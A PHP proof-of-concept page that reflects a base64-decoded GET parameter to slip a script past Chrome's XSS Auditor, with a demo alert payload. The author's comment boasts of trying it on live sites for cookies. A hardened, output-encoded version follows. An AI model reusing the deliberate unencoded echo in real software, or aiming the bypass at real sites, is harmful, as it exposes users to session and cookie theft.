<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Proof of Concept-XSS in Chrome</title>
</head>
<body>
<?php
/*
* Bypassing XSS Auditor of Chrome.
* App takes a $_GET parameter named b64
* i.e. poc.php?b64=base64data and echoes
* whatever is in base64. A quick demo is
* poc.php?b64=PHNjcmlwdD5hbGVydCgiSGVsbG8gV29ybGQgQWdhaW4iKTs8L3NjcmlwdD4=
* Base64 decoding results in <script>alert("Hello World Again");</script>
* Sample apps that suffer from this
* are quite easy to find, although
* I haven't come up with a Google Dork.
* Yet I have tested it in some apps in
* the wild and it works. Cookies and
* stuff. Feed me cookies, lol.
* Sample URL:
*
* @fr1t3
*/
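// Ok, PoC: decode the b64 parameter and reflect it with no output encoding.
// This echo is the deliberately vulnerable sink; a missing parameter decodes to ''.
$XSSMe = base64_decode($_GET['b64'] ?? '');
echo $XSSMe;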
?>
</body>
</html>
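Added example, not part of the original PoC: the same handler with the reflection made safe. A browser-side filter that compares request and response cannot match a base64 parameter against the decoded markup, so the fix has to be output encoding on the server. The helper name `render_b64_param()` and the 4096-byte limit are assumptions made for this sketch.

```php
<?php
declare(strict_types=1);

// Hardened counterpart of poc.php (added example; names and limits are assumptions).

/**
 * Decode the b64 parameter and return it encoded for the HTML body context.
 * Returns '' for anything that is not a short, strictly valid base64 string.
 */
function render_b64_param($raw): string
{
    // ?b64[]=x arrives as an array; accept plain strings only.
    if (!is_string($raw) || $raw === '' || strlen($raw) > 4096) {
        return '';
    }

    // Strict mode rejects input containing characters outside the base64 alphabet.
    $decoded = base64_decode($raw, true);
    if ($decoded === false) {
        return '';
    }

    // Encode at the point of output: <, >, &, " and ' become entities,
    // and invalid UTF-8 is substituted rather than passed through.
    return htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

if (PHP_SAPI !== 'cli') {
    // Second layer: a server-sent policy that does not depend on the browser
    // recognising the payload in the request.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    header('X-Content-Type-Options: nosniff');
    echo render_b64_param($_GET['b64'] ?? null);
} else {
    // Command-line run using the demo value quoted in the PoC comment:
    // the decoded markup is printed as inert text with its tags entity-encoded.
    $demo = 'PHNjcmlwdD5hbGVydCgiSGVsbG8gV29ybGQgQWdhaW4iKTs8L3NjcmlwdD4=';
    echo render_b64_param($demo), PHP_EOL;
}
```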